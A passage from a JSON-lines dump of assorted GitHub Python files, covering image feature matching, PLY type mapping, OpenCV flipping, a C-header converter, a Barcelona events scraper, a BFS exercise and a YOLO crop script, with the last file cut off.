cluster[labels[j]]['max_activation']:\n cluster[labels[j]]['max_activation'] = correspondence[2][j]\n cluster[labels[j]]['max_activation_idx'] = j\n\n # pprint(cluster)\n\n for i in range(k):\n max_activation_idx = cluster[i]['max_activation_idx']\n top_cluster_correspondence[0].append(correspondence[0][max_activation_idx])\n top_cluster_correspondence[1].append(correspondence[1][max_activation_idx])\n top_cluster_correspondence[2].append(correspondence[2][max_activation_idx])\n\n return top_cluster_correspondence\n\n def caculate_mid_correspondence(self, correspondence):\n mid_correspondence = []\n for i in range(len(correspondence[0])):\n x_m = math.floor((correspondence[0][i][0] + correspondence[1][i][0]) / 2)\n y_m = math.floor((correspondence[0][i][1] + correspondence[1][i][1]) / 2)\n mid_correspondence.append([x_m, y_m])\n\n return mid_correspondence\n\n def transfer_style_local(self, F_A, F_B, patch_size, image_width, mapping_a_to_b, mapping_b_to_a, L):\n \"\"\"\n F_A, F_B 深层特征图\n mapping_a_to_b, mapping_b_to_a 从 F_B, F_A 得到映射特征图\n FL_1A, FL_1B 浅层特征图\n + RL_1B, RL_1A 映射特征图; 从 wraped L 层 学到 L-1 层\n 取均值,得到 common local feature\n \"\"\"\n\n # L 层的 mapping, upsample 到 L-1 层\n initial_map_a_to_b = self.upsample_mapping(mapping_a_to_b) # nearest 上采样 mapping, 在对应区域 coarse-to-fine\n initial_map_b_to_a = self.upsample_mapping(mapping_b_to_a)\n\n FL_1A = self.features_A[L - 2] # -1 上一层, -1 idx 从 0\n FL_1B = self.features_B[L - 2]\n\n t1 = time.time()\n\n # B->A\n F_B_warped = self.warp(F_A.size(), F_B, patch_size, mapping_a_to_b) # B 特征 wrap 到 A(i,j) 位置\n F_A_warped = self.warp(F_B.size(), F_A, patch_size, mapping_b_to_a) # A 特征 wrap 到 B(i,j) 位置\n\n # Note: freeze 中间 layer [L-1,L];\n # 更新对象:和 L-1 层 feature 同 size 的 feature; 使模型输出 和 warped feature 相似\n RL_1B = self.model.deconv(F_B_warped, image_width, L, L - 1)\n RL_1A = self.model.deconv(F_A_warped, image_width, L, L - 1)\n print('warp time:', time.time() - t1)\n # 1.0, 2.19, 2.92, 2.70 # 模型学得过程竟然还更快一些\n\n # RL_1B = self.warp(FL_1A.size(), FL_1B, patch_size, initial_map_a_to_b)\n # RL_1A = self.warp(FL_1B.size(), FL_1A, patch_size, initial_map_a_to_b)\n # print('warp time:', time.time() - t1)\n # 0.22, 0.88, 3.53, 14\n\n # 浅层 feature + 深层 feature 映射坐标位\n FL_1Am = (FL_1A + RL_1B) * 0.5 # unnormalized\n FL_1Bm = (FL_1B + RL_1A) * 0.5\n\n return [FL_1A, FL_1B, FL_1Am, FL_1Bm, initial_map_a_to_b, initial_map_b_to_a]\n\n def finalize_correspondence(self, correspondence, image_width, L):\n print(\"Drawing correspondence...\")\n unique_correspondence = self.make_correspondence_unique(correspondence)\n scaled_correspondence = self.scale_correspondence(unique_correspondence, L)\n # draw.draw_correspondence(self.A, self.B, scaled_correspondence, self.draw_radius[L - 1], self.save_dir, L)\n scaled_correspondence = self.remove_border_correspondence(scaled_correspondence, self.border_size, image_width)\n print(\"No. of correspondence: \", len(scaled_correspondence[0]))\n return scaled_correspondence\n\n def run(self, A, B):\n assert (A.size() == B.size())\n image_width = A.size(3)\n util.mkdir(self.save_dir)\n\n print(\"Saving original images...\")\n util.save_final_image(A, 'original_A', self.save_dir)\n util.save_final_image(B, 'original_B', self.save_dir)\n\n self.A = self.Tensor(A.size()).copy_(A)\n self.B = self.Tensor(B.size()).copy_(B)\n\n print(\"Starting algorithm...\")\n # coarse-to-fine\n L_start = 5\n\n # todo: 直接获取所有需要使用的中间特征\n self.model.set_input(self.A)\n self.features_A = self.model.get_all_layer_output(L_start)\n self.model.set_input(self.B)\n self.features_B = self.model.get_all_layer_output(L_start)\n\n F_A = self.features_A[L_start - 1]\n F_B = self.features_B[L_start - 1]\n F_Am, F_Bm = F_A.clone(), F_B.clone()\n\n # 1.初始坐标位 a_to_b, b_to_a\n initial_map_a_to_b = self.identity_map(F_B.size()) # 1,512,14,14\n initial_map_b_to_a = initial_map_a_to_b.clone()\n\n # L: deepest to shallowest\n for L in range(L_start, self.L_final - 1, -1): # 5, self.L_final = 2 if fast else 1\n patch_size = self.patch_size_list[L - 1] # [3,3]\n search_box_radius = self.search_box_radius_list[L - 1] # 2, (path+1)/2\n draw_radius = self.draw_radius[L - 1] # 8\n\n if L == L_start:\n deepest_level = True # 最深层\n correspondence = [] # begin\n else:\n deepest_level = False\n # correspondence: 中间层,基于上轮(+1层) correspondence 寻找 search region\n\n print(\"Finding best-buddies for the \" + str(L) + \"-th level\")\n\n # 2.对应后坐标位 和 NBBs\n # correspondence: [[A_pts], [B_pts], [rank_activation]]\n # mapping_a_to_b, mapping_b_to_a; 坐标位\n correspondence, mapping_a_to_b, mapping_b_to_a = self.find_neural_best_buddies(\n correspondence, F_A, F_B, F_Am, F_Bm, patch_size,\n initial_map_a_to_b, initial_map_b_to_a,\n search_box_radius, deepest_level\n )\n\n # 3.tau 过滤 H(p)\n # correspondence: [[A_pts], [B_pts], [rank_activation >= tau]]\n correspondence = self.threshold_response_correspondence(correspondence,\n self.H_A, self.H_B, # l2 and min_max norm feature\n self.tau) # 可以不用手工设置,保留一些统计结果?\n # print(f'thre >= {self.tau}:', len(correspondence[0]))\n\n # 设置 k_per_level, 由深到浅的每一层 都执行 k-means 选择 NBBs; 减少计算量\n if self.k_per_level < float('inf'):\n correspondence = self.top_k_in_clusters(correspondence, int(self.k_per_level))\n # print(f'cluster k({self.k_per_level}):', len(correspondence[0]))\n\n # scale_correspondence 坐标位,在原图画出对应\n if L > self.L_final:\n # print(\"Drawing correspondence...\")\n scaled_correspondence = self.scale_correspondence(correspondence, L)\n # draw.draw_correspondence(self.A, self.B, scaled_correspondence, draw_radius, self.save_dir, L)\n\n # 获取 L-1 层特征\n F_A, F_B, F_Am, F_Bm, initial_map_a_to_b, initial_map_b_to_a = self.transfer_style_local(\n F_A, F_B, patch_size, image_width, mapping_a_to_b, mapping_b_to_a, L\n )\n\n filtered_correspondence = self.finalize_correspondence(correspondence, image_width, self.L_final)\n top_k_correspondence = self.top_k_in_clusters(filtered_correspondence, self.k_final)\n\n # draw and save\n # final L=1\n draw_radius = self.draw_radius[self.L_final - 1]\n # draw.draw_correspondence(self.A, self.B, filtered_correspondence, draw_radius, self.save_dir, self.L_final)\n # self.save_correspondence_as_txt(filtered_correspondence)\n\n # final L=1, top k\n draw.draw_correspondence(self.A, self.B, top_k_correspondence, draw_radius, self.save_dir, self.L_final, self.k_final)\n self.save_correspondence_as_txt(top_k_correspondence, name='_top_' + str(self.k_final))\n\n # return scaled_correspondence\n return top_k_correspondence\n","repo_name":"Shuai-Xie/NBBs","sub_path":"algorithms/neural_best_buddies.py","file_name":"neural_best_buddies.py","file_ext":"py","file_size_in_byte":28759,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"97"} +{"seq_id":"13346652791","text":"import sys\n\nfrom .cmdline import parse_cmdline\nfrom .exceptions import BriefcaseError\n\n\ndef main():\n try:\n command, options = parse_cmdline(sys.argv[1:])\n command.parse_config('pyproject.toml')\n command(**options)\n result = 0\n except BriefcaseError as e:\n print(e, file=sys.stdout if e.error_code == 0 else sys.stderr)\n result = e.error_code\n except KeyboardInterrupt:\n print()\n print(\"Aborted by user.\")\n print()\n result = -42\n\n sys.exit(result)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"IvanaXu/PyTools","sub_path":"077.Test_BeeWare_windows/beeware-tutorial/beeware-venv/Lib/site-packages/briefcase/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"97"} +{"seq_id":"22701569029","text":"import numpy as np\nfrom .PlyException import CPlyException\n\ndicPlyToNp = {\n \"char\": \"i1\",\n \"short\": \"i2\",\n \"int\": \"i4\",\n \"uchar\": \"u1\",\n \"ushort\": \"u2\",\n \"uint\": \"u4\",\n \"int8\": \"i1\",\n \"int16\": \"i2\",\n \"int32\": \"i4\",\n \"uint8\": \"u1\",\n \"uint16\": \"u2\",\n \"uint32\": \"u4\",\n \"float\": \"f4\",\n \"double\": \"f8\",\n \"float16\": \"f2\",\n \"float32\": \"f4\",\n \"float64\": \"f8\",\n}\n\ndicNpToPly = {\n \"i1\": \"char\",\n \"i2\": \"short\",\n \"i4\": \"int\",\n \"u1\": \"uchar\",\n \"u2\": \"ushort\",\n \"u4\": \"uint\",\n \"f2\": \"float16\",\n \"f4\": \"float\",\n \"f8\": \"double\",\n}\n\n\ndef _ApplyFormatToType(_sType, _sFormat):\n\n if _sFormat == \"binary_little_endian\":\n sType = \"<\" + _sType\n elif _sFormat == \"binary_big_endian\":\n sType = \">\" + _sType\n elif _sFormat == \"ascii\":\n sType = _sType\n else:\n raise CPlyException(\"Unknown PLY format identifier '{0}'\".format(sFormat))\n # endif\n\n return sType\n\n\n# enddef\n\n\ndef GetNamedNumpyType(*, sName, sPlyType, sFormat):\n sNpType = dicPlyToNp.get(sPlyType)\n if sNpType is None:\n raise CPlyException(\"Unknown PLY type identifier '{0}'\".format(sPlyType))\n # endif\n\n sNpType = _ApplyFormatToType(sNpType, sFormat)\n return np.dtype([(sName, sNpType)])\n\n\n# enddef\n\n\ndef GetNumpyType(*, sPlyType, sFormat):\n sNpType = dicPlyToNp.get(sPlyType)\n if sNpType is None:\n raise CPlyException(\"Unknown PLY type identifier '{0}'\".format(sPlyType))\n # endif\n\n sNpType = _ApplyFormatToType(sNpType, sFormat)\n return np.dtype(sNpType)\n\n\n# enddef\n","repo_name":"boschresearch/image-render-blender-points","sub_path":"src/anypoints/plyio/PlyType.py","file_name":"PlyType.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"17420881059","text":"import cv2\nimport numpy as np\n\nimage = cv2.imread(\"cow.jpg\")\ncv2.imshow(\"image\", image)\n\n# flip horizontally\nflipped1 = cv2.flip(image, 0)\ncv2.imshow(\"image1\", flipped1)\n\n# flip vertically\nflipped2 = cv2.flip(image, 1)\ncv2.imshow(\"image2\", flipped2)\n\n# flip both horizontally and vertically\nflipped3 = cv2.flip(image, -1)\ncv2.imshow(\"image3\", flipped3)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"mhdr/OpenCVSamples","sub_path":"009/flip.py","file_name":"flip.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"3829448932","text":"# Parses a low-level driver C-header file looking for function declarations.\n# Converts only the function declarations to mid-level driver compatible declarations.\n\nimport re\n# Create a function-matching regex.\n# fn_regex = re.compile(r'.+?\\s+?.+?\\s+?.+?\\(.+?\\);')\nfn_regex = re.compile(r'^([^()]*\\s+)*[^()]+\\(.*\\);')\n\n# Startup arguments.\nIN_FILENAME = 'input/tl.h'\nOUT_FILENAME = 'tl_h_fn_out.py'\nAUTO_DETECT_PREFIX = True\n\nf = open(IN_FILENAME, 'r')\noutfiles = []\nif AUTO_DETECT_PREFIX == False:\n o = open('output/' + OUT_FILENAME, 'w')\nelse:\n o = None\n\nprefixes = []\nopened_output_files = []\nignorable_definitions = []\n\ni = 0\npack = 0\nwithin_struct = False\nstruct_name = ''\nwhile True:\n i += 1\n line = f.readline()\n if not line:\n break\n\n # First, get rid of extraneous symbols.\n line = line.replace('\\n', '')\n # line = line.replace(';', '')\n line = line.strip()\n # print(line)\n\n # Finds empty #defines and makes a list of them.\n if line.startswith('#define '):\n # This ensures that in the event of:\n # '#define IMPORTANT_VALUE 5' the ignorable string will be 'IMPORTANT_VALUE 5', and\n # therefore won't ever match. However, if it is instead:\n # '#define USELESS_DEFINE' then the string will be 'USELESS_DEFINE' and will match.\n ignorable_definitions.append(line[8 : len(line)])\n continue\n\n if fn_regex.match(line) is not None:\n # print(str(i) + ': ' + line)\n print(\"LINE \" + str(i) + ': ')\n\n # Figure out the function's name.\n fn_split = line.split(' ')\n fn_split = [section.strip() for section in fn_split]\n # print(fn_split)\n j = 0\n while True:\n if j >= len(fn_split):\n j = -1\n break\n retval = fn_split[j].find('(')\n # print(\"RETVAL: \" + str(retval))\n if retval == -1:\n # No '(' found, keep looking.\n j += 1\n continue\n elif retval == 0:\n # '(' found, but its the first char in the string. Function format must be: name (args), so use previous\n # string entry in the list.\n j -= 1\n break\n else:\n break\n\n if j < 0:\n print(\"Failed to parse function on line \" + str(i) + \"!\")\n exit()\n\n if fn_split[j].find('(') != -1:\n fn_name = fn_split[j][0 : fn_split[j].find('(')]\n else:\n fn_name = fn_split[j]\n fn_ret = ''\n k = 0\n while True:\n if k == j:\n break\n fn_ret = fn_ret + fn_split[k] + ' '\n k += 1\n\n # Removes blank #defines from in front of the return type; reduces clutter and confusion.\n for substring in ignorable_definitions:\n if fn_ret.startswith(substring):\n fn_ret = fn_ret[len(substring) + 1 :]\n break \n\n print(\"Function return type: \" + fn_ret)\n\n print(\"Function name: \" + fn_name)\n\n fn_prefix = fn_name.split('_')[0]\n print(\"Function prefix: \" + fn_prefix)\n\n if AUTO_DETECT_PREFIX:\n fn_prefixed_outfilename = fn_prefix + '_' + OUT_FILENAME\n print(\"Output file: \" + fn_prefixed_outfilename)\n if fn_prefix not in prefixes:\n # File not yet opened.\n outfiles.append((fn_prefixed_outfilename, open('output/' + fn_prefixed_outfilename, 'w')))\n prefixes.append(fn_prefix)\n o = [file for (name, file) in outfiles if name == fn_prefixed_outfilename][0]\n # print(o)\n\n # Remove prefix from function's name.\n fn_name = fn_name[len(fn_prefix) + 1: len(fn_name)]\n \n # Find the function's arguments.\n fn_args = line[line.find('(') + 1 : line.find(')')].split(',')\n fn_args = [arg.strip() for arg in fn_args]\n if (len(fn_args) == 0):\n print(\"Function args: NO ARGUMENTS\")\n else:\n print(\"Function args:\")\n print(fn_args)\n\n # Write data for this function to file.\n o.write(fn_name + ' = Sig(')\n\n # Determine args as 'in' or 'out.'\n # If there are more than 0 arguments.\n if fn_args[0] != '' and fn_args[0] != 'void':\n first = True\n for arg in fn_args:\n # print(arg)\n if (arg.find('**') != -1):\n print('out')\n if first:\n first = False\n else:\n o.write(', ')\n o.write('\\'out\\'')\n else:\n if first:\n first = False\n else:\n o.write(', ')\n print('in')\n o.write('\\'in\\'')\n if (fn_ret.find('void') != -1):\n o.write(', ')\n if (fn_ret.find('void') != -1):\n o.write('ret=ret_ignore')\n\n o.write(')\\n')\n\n\n print('\\n')\n\nfor (name, file) in outfiles:\n file.close()\n","repo_name":"mitbailey/driver_converter","sub_path":"fn_convert.py","file_name":"fn_convert.py","file_ext":"py","file_size_in_byte":5120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"34005737119","text":"#!/usr/bin/python3\n\n# PEP Guidelines:\n################################COMMENT################################\n#####################################CODE##################################### \n\n#############################\n# We got company. #\n# Imports? #\n# How many? #\n# Uh, all of them, I think. #\n#############################\n\nimport sys\nimport os\nimport re\nimport argparse\nimport urllib.request\nimport xml.etree.ElementTree as ET \nimport math\nimport unicodedata\nfrom datetime import datetime, timedelta\nfrom ast import literal_eval\n\nDATE_FORMAT = \"%d/%m/%Y\"\nFULL_FORMAT = \"%d/%m/%Y %H.%M\"\n\n\n\"\"\" PROJECT ASSUMPTIONS\n\n -> All arguments are separated just by commas ','\n and NOT by comma and space ', ' !!!\n\n -> Metros can only go in lists, and checks for all metro stations\n that come as an argument. Lists are disjunctive (OR).\n\n -> Dates are parsed as a list. Each list can contain either a string\n (single date) or a tuple (interval of dates). No lists are allowed\n inside dates, as it would be pointless for its evaluation.\n Also, It doesn't matter if the interval numbers are positive \n or negative, dates will be normalized.\n\n -> The top 5 metro stations are sorted by their exits. Also, other \n public transport services (bus, tram...) won't be parsed, \n excluding FGC (they a part of the metro network!)\n \n -> The script will automatically open the generated XML with Firefox\n on (at least) GNU/Linux, not any other browsers or OSs. \n If you don't have it installed, you'll have to open the file\n <index.html> manually.\n\n -> Children are people under 18 y.o. Note that sometimes the keywords\n may produce unsuitable results. These are NEVER intended!\n\n\"\"\"\n\n####################\n# Argument parsing #\n####################\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--key', \n help='select items containing keys', \n type=str\n)\nparser.add_argument('--date', \n help='get items on date (or interval of dates)', \n type=str\n)\nparser.add_argument('--metro', \n help='get metro stations from BCN\\'s metro. Range: 1..11', \n type=str\n)\nargs = parser.parse_args()\n\nArgs_Keys = []\nArgs_Dates = []\nArgs_Metro = []\n\n\n###########\n# Classes #\n###########\n \nclass Address:\n def __init__(self, locRoot):\n asimp = locRoot.find('.//adreca_simple')\n self.name = asimp.find('carrer').text\n self.numero = int(asimp.find('numero').text)\n self.barri = asimp.find('barri').text\n self.coord = self._Process_Coord(locRoot.find('.//coordenades'))\n \n def _Process_Coord(self, coord): # PRIVATE\n gMaps = coord.find('googleMaps')\n lontxt = gMaps.get('lon')\n lattxt = gMaps.get('lat')\n try:\n lon = float(lontxt)\n lat = float(lattxt)\n return (lat, lon)\n except :\n return (-1.0, -1.0) # Unknown location -> No metro for you\n\n\n def __repr__(self):\n return self.name + \" \\n \" + self.barri + \"\\n C \" + str(self.coord) \n\n def getName(self): \n return self.name + ', ' + str(self.numero)\n \n def getNumber(self): \n return self.numero\n\n def getBarri(self): \n return self.barri\n\n def getLongitude(self): \n return self.coord[1]\n \n def getLatitude(self): \n return self.coord[0]\n\n\nclass Event:\n def __init__(self, act, ageRange):\n self.name = act.find('nom').text\n self.address = Address(act.find('.//lloc_simple'))\n self.age = ageRange\n\n day = act.find('.//data_proper_acte').text\n self.date = datetime.strptime(day, FULL_FORMAT)\n\n\n def getName(self): \n return self.name\n \n def getAddress(self): \n return self.address\n\n def getAge(self): \n return self.age\n\n# ADD/SUBTRACT TIME IN days USING TODAY AS A REFERENCE: \n# datetime.today() {+|-} timedelta(days=5)\n#\n \n def getFullDate(self):\n return self.getDateAsDTDT().strftime(FULL_FORMAT)\n \n def getDate(self):\n return self.getDateAsDTDT().strftime(DATE_FORMAT)\n\n def getDateAsDTDT(self):\n return self.date\n\n\n def __repr__(self):\n name = self.name \n addr = \"\\n \" + self.address.__repr__()\n age = \"\\n \" + self.age\n date = \"\\n \" + self.date.strftime(DATE_FORMAT) + \"\\n\"\n return name + addr + age + date\n\n\n def getLongitude(self):\n return self.address.getLongitude()\n \n\n def getLatitude(self):\n return self.address.getLatitude()\n\n\n\"\"\" \n Note: Metro stations appear several times, but on the\n ranking there (may not) be any stations repeated!\n\"\"\"\nclass Metro:\n def __init__(self, act):\n self.name = clean(act.find('Tooltip').text)[:-1] #remove '-'\n self.lat = float(act.find('Coord').find('Latitud').text)\n self.lon = float(act.find('Coord').find('Longitud').text)\n \n\n def __repr__(self):\n return self.name + \" [\" + str(self.lat) + \", \" + str(self.lon) + \"]\"\n\n\n def getFullName(self):\n return self.name\n\n\n def getStationName(self):\n return self.name[:string.index(\" (\")]\n \n\n def getLongitude(self):\n return self.lon\n \n\n def getLatitude(self):\n return self.lat\n\n\n####################################################\n# Functions: data parsing, maths, cleaning, etc... #\n####################################################\n\n\n\ndef fillKeys(Keys):\n return literal_eval(Keys)\n\ndef fillDate(Dates):\n rgx = \"([0-3][0-9]/[0-1][0-9]/[0-9][0-9][0-9][0-9])\"\n regex_dates = re.sub(rgx, \"\\\"\\g<1>\\\"\", Dates)\n return literal_eval(regex_dates)\n\ndef fillMetro(Metros):\n return Metros[1:-1].split(',')\n\n \n# Get all current activities suitable for children \ndef Children_Activities():\n Dict = dict()\n # Expressions that will (or may) return activities for kids\n # Assumed these age ratings per filter found *at first*\n filters = [\n ('famil', \"Per a tots els públics\"), \n ('nadal', \"Per a tots els públics\"), \n ('infant', \"De 3 a 11 anys\"),\n ('titell', \"De 0 a 8 anys\"),\n ('petit', \"De 2 a 10 anys\"),\n ('escol', \"De 3 a 16 anys\"), \n ('jug', \"De 5 a 15 anys\"),\n ('sport', \"De 7 a 18 anys\"),\n ('jove', \"De 10 a 18 anys\")\n ]\n\n for fltr in filters:\n for act in root_events.findall('.//acte'):\n name = clean( act.find('nom').text ) \n\n llocsimp = act.find('.//lloc_simple')\n lloc = clean( llocsimp.find('nom').text ) \n\n adrec = llocsimp.find('.//adreca_simple')\n if (adrec.find('barri').get('codi') != \"\"): \n barri = clean( adrec.find('barri').text )\n if fltr[0] in (name or lloc or barri):\n Dict[name] = Event(act, fltr[1]) \n\n return Dict\n\n## Filters for keys ##\n\n# Checks if word is in event\ndef findWord(event, word):\n name = clean(event.getName())\n lloc = clean(event.getAddress().getName())\n barri = clean(event.getAddress().getBarri())\n return word in (name or lloc or barri)\n\ndef check(event, Expr_Filter):\n #BASE CASE:\n if type(Expr_Filter) is str:\n return findWord(event, Expr_Filter)\n \n #LIST CASE, recursive AND\n elif type(Expr_Filter) is list:\n return all(check(event, item) for item in Expr_Filter)\n \n #TUPLE CASE, recursive OR\n elif type(Expr_Filter) is tuple:\n return any(check(event, item) for item in Expr_Filter)\n\n #Debug case, should never happen.\n else: return False\n\n\n\n## Filters for dates ##\n\ndef findDate(event, datestr):\n tmpDate = datetime.strptime(datestr, DATE_FORMAT).date()\n EventDate = event.getDateAsDTDT().date()\n \n return (EventDate == tmpDate)\n\n\ndef findDateTuple(event, datetup):\n tmpDate = datetime.strptime(datetup[0], DATE_FORMAT).date()\n DateMin = tmpDate - timedelta(days = abs(datetup[1]))\n DateMax = tmpDate + timedelta(days = abs(datetup[2]))\n EventDate = event.getDateAsDTDT().date()\n \n return (DateMin <= EventDate <= DateMax)\n\ndef dateCheck(event, DateList):\n #BASE CASE => One item, check if event matches day:\n if type(DateList) is str:\n return findDate(event, DateList)\n \n #TUPLE CASE (Base case 2), check interval\n elif type(DateList) is tuple:\n return findDateTuple(event, DateList)\n \n #LIST CASE, recursive OR\n elif type(DateList) is list:\n return any(dateCheck(event, item) for item in DateList )\n \n #Debug case, should never happen.\n else: return False\n\n\n# Only parse stations from the lines chosen\ndef parseMetroArgs(Args_Metro):\n getMetro = dict()\n for fm in Args_Metro:\n for metroBoca in root_metro.findall('Punt'):\n station = metroBoca.find('Tooltip').text\n if fm in station :\n if 'METRO' in station:\n getMetro[station] = Metro(metroBoca)\n elif 'FGC' in station:\n getMetro[station] = Metro(metroBoca) \n return getMetro\n\n\n# Parse each and every metro station!\ndef parseMetro():\n getMetro = dict()\n for metroBoca in root_metro.findall('Punt'):\n station = metroBoca.find('Tooltip').text\n if 'METRO' in station:\n getMetro[station] = Metro(metroBoca) \n elif 'FGC' in station:\n getMetro[station] = Metro(metroBoca) \n return getMetro\n\n\n# Get best 5 metro exits per event\ndef EventsWithTop5Metro(Dict, Metro):\n MetroDict = dict()\n for i in Dict: \n LisTop = list()\n for j in Metro:\n k = distances(Dict[i], Metro[j])\n if (k < 500):\n LisTop.append( (k, Metro[j].getFullName()) )\n\n ListFilt = sorted(LisTop)[:5]\n MetroDict[i] = ListFilt[:5]\n return MetroDict\n\n\n##########################\n# Functions: maths + aux #\n##########################\n\n\n#Calculating distance: First vals from origin point,\n# next vals from (potential) destination\ndef getDistance(lat_ori, lon_ori, lat_dest, lon_dest):\n Earth_radius = 6371000\n \n #Radians\n rad_lat1 = math.radians(lat_ori)\n rad_lat2 = math.radians(lat_dest)\n\n #Deltas for latitude and longitude\n DLat = math.radians(lat_dest - lat_ori) \n DLon = math.radians(lon_dest - lon_ori)\n \n #Math stuff\n sin_lat = math.sin(DLat/2) ** 2\n mults = math.cos(rad_lat2) * math.cos(rad_lat1) *math.sin(DLon/2) ** 2\n merge = sin_lat + mults\n tgs = 2*( math.atan2(math.sqrt(merge), math.sqrt(1-merge)) )\n\n return Earth_radius * tgs\n\n\ndef distances(Cand, Metro):\n lat_ori = Cand.getLatitude()\n lon_ori = Cand.getLongitude()\n lat_dest = Metro.getLatitude()\n lon_dest = Metro.getLongitude()\n\n return getDistance(lat_ori, lon_ori, lat_dest, lon_dest)\n\n#Get dictionary intersection\ndef dict_intersect(*dicts):\n comm_keys = dicts[0].keys()\n for d in dicts[1:]:\n comm_keys &= d.keys()\n\n result = { key : \n {d[key] for d in dicts} \n for key in comm_keys\n }\n return result\n\ndef clean(str):\n # NFKD for ensuring max compatibility\n normal = unicodedata.normalize('NFKD', str.lower()) \n ascii_str = normal.encode('ascii', 'ignore').decode('ascii')\n return ascii_str\n\n\ndef loadXML(N):\n if (N == 'events'):\n link = \"http://w10.bcn.es/APPS/asiasiacache/peticioXmlAsia?id=199\"\n elif (N == 'metro'):\n link0 = \"http://opendata-ajuntament.barcelona.cat/\"\n link = link0 + \"resources/bcn/TRANSPORTS GEOXML.xml\"\n \n socket = urllib.request.urlopen(link)\n xml_Source = socket.read()\n socket.close()\n return ET.fromstring(xml_Source)\n\n\n##############################\n# Functions: HTML generation #\n##############################\n\ndef inflateTable(MStats, Dict):\n strng = \"\"\n try:\n for i in Dict:\n name = Dict[i].getName()\n strng += \"<tr><td>\" + name + \"\"\"</td>\n <td>\"\"\" + Dict[i].getAddress().getName() + \"\"\"</td> \n <td>\"\"\" + Dict[i].getFullDate() + \"\"\"</td>\n <td>\"\"\" + Dict[i].getAge() + \"</td><td><ul>\"\n for j in MStats[i]:\n num = str(j[0])[:7]\n plc = str(j[1])\n strng += \"<li>\" + num + \" m <br>\" + plc + \"</li>\"\n strng += \"</ul></td></tr>\"\n return strng\n except Exception as e:\n print(\"FATAL ERROR: \", e)\n return \"\"\n\n\n\ndef createHTML(MStats, Dict):\n try:\n website = open(\"index.html\", \"w\")\n headr = \"<!DOCTYPE html><meta charset=\\\"utf-8\\\"/>\\\n <html><head><title>BCN Events [LP]
\\\n

Events pròxims:

\"\n\n inflate = inflateTable(MStats, Dict)\n bottom = \"
NOMADREÇA\\\n DATA I HORAEDAT RECOMANADA\\\n SORTIDA DE METRO A < 500 m
\"\n website.write(headr + inflate + bottom)\n website.close()\n return True\n except Exception as e:\n print(\"FATAL ERROR: \", e)\n return False\n\n# PRE-REQUIREMENT: Firefox installed\ndef launchHTML():\n print(\"Launching HTML on Firefox... :-)\")\n args = \"firefox index.html &\"\n os.system(args)\n\n###############################################\n# Main, except it's not defined as such (yet) #\n###############################################\n\n# XML Parsing\nroot_events = loadXML('events')\nroot_metro = loadXML('metro')\n\nif __name__ == \"__main__\":\n debug = False\n\n if (args.key): Args_Keys = fillKeys(args.key) \n if (args.date): Args_Dates = fillDate(args.date) \n if (args.metro): Args_Metro = fillMetro(args.metro) \n\n if debug:\n\n print(\"--------< List Debug >--------\")\n print(Args_Keys)\n print(Args_Dates)\n print(len(Args_Dates))\n print(Args_Metro)\n print(\"--------< /List Debug >-------\")\n \n\n print(\"Getting all activities suitable for children...\")\n\n Candidates = Children_Activities()\n \n if debug:\n for i in Candidates: \n print(Candidates[i])\n\n print(\"Filtering by keys (if any) ...\")\n\n Dict = dict()\n if (len(Args_Keys) > 0): \n Dict = { i : \n Candidates[i] for i in Candidates\n if check(Candidates[i], Args_Keys)\n }\n else: \n Dict = Candidates\n\n if debug:\n for i in Dict: print(i)\n\n print(\"Filtering by dates (if any) ...\")\n\n DictD = dict()\n if (len(Args_Dates) != 0): \n Dict = { i : \n Dict[i] for i in Dict\n if dateCheck(Dict[i], Args_Dates)\n }\n\n if debug:\n for i in Dict: print(i)\n\n print(\"Filtering selected metro lines (if any) ...\")\n\n DictM = dict()\n if (len(Args_Metro) != 0): \n DictM = parseMetroArgs(Args_Metro)\n else:\n DictM = parseMetro()\n\n\n print(\"Getting 5 nearest metro stations by event\")\n Top5 = EventsWithTop5Metro(Dict, DictM)\n \n\n print(\"Generating HTML with data\")\n web_success = createHTML(Top5, Dict)\n if web_success: \n launchHTML()\n","repo_name":"MNXANL/GRAU-LP","sub_path":"Python/PracticaPython/cerca.py","file_name":"cerca.py","file_ext":"py","file_size_in_byte":14977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"5619490603","text":"test_num = int(input())\n\nfor t in range(test_num):\n N, M = map(int,input().split())\n\n adj = [[] for i in range(N+1)]\n\n for i in range(M):\n a,b = map(int,input().split())\n adj[a].append(b)\n adj[b].append(a)\n\n # print(adj)\n visited = [False for i in range(N+1)]\n visited[1] = True\n queue = [1]\n friend_num = 0\n cnt = 0\n\n while queue:\n if cnt == 2:\n break\n cnt += 1\n for i in range(len(queue)):\n temp = queue.pop(0)\n for friend in adj[temp]:\n if not visited[friend]:\n visited[friend] = True\n friend_num += 1\n queue.append(friend)\n\n print('#' + str(t+1) + ' ',end='')\n print(friend_num)","repo_name":"seoul-ssafy-class-2-studyclub/Hyejune","sub_path":"5521_상원이의생일파티.py","file_name":"5521_상원이의생일파티.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"97"} +{"seq_id":"26580083620","text":"import os\nfrom secrets import token_hex\n\nimport cv2\n\nfrom src.yolo import detector\n\nimages_folder_path = '/home/muladzevitali/media/shop_products_bottle_2/images'\noutput_folder_path = '/home/muladzevitali/media/shop_products_bottle_2/outputs'\n\nfor image_name in os.listdir(images_folder_path):\n image_path = os.path.join(images_folder_path, image_name)\n image = cv2.imread(image_path)\n coordinates = detector.detect(image_path)\n for index_, coordinate in enumerate(coordinates):\n # Take image from half and above\n y_start_coordinate = coordinate[1][1] - int((coordinate[1][1] - coordinate[0][1]) * 0.5)\n cropped_image = image[coordinate[0][1]:y_start_coordinate, coordinate[0][0]: coordinate[1][0]]\n cropped_image_path = os.path.join(output_folder_path, 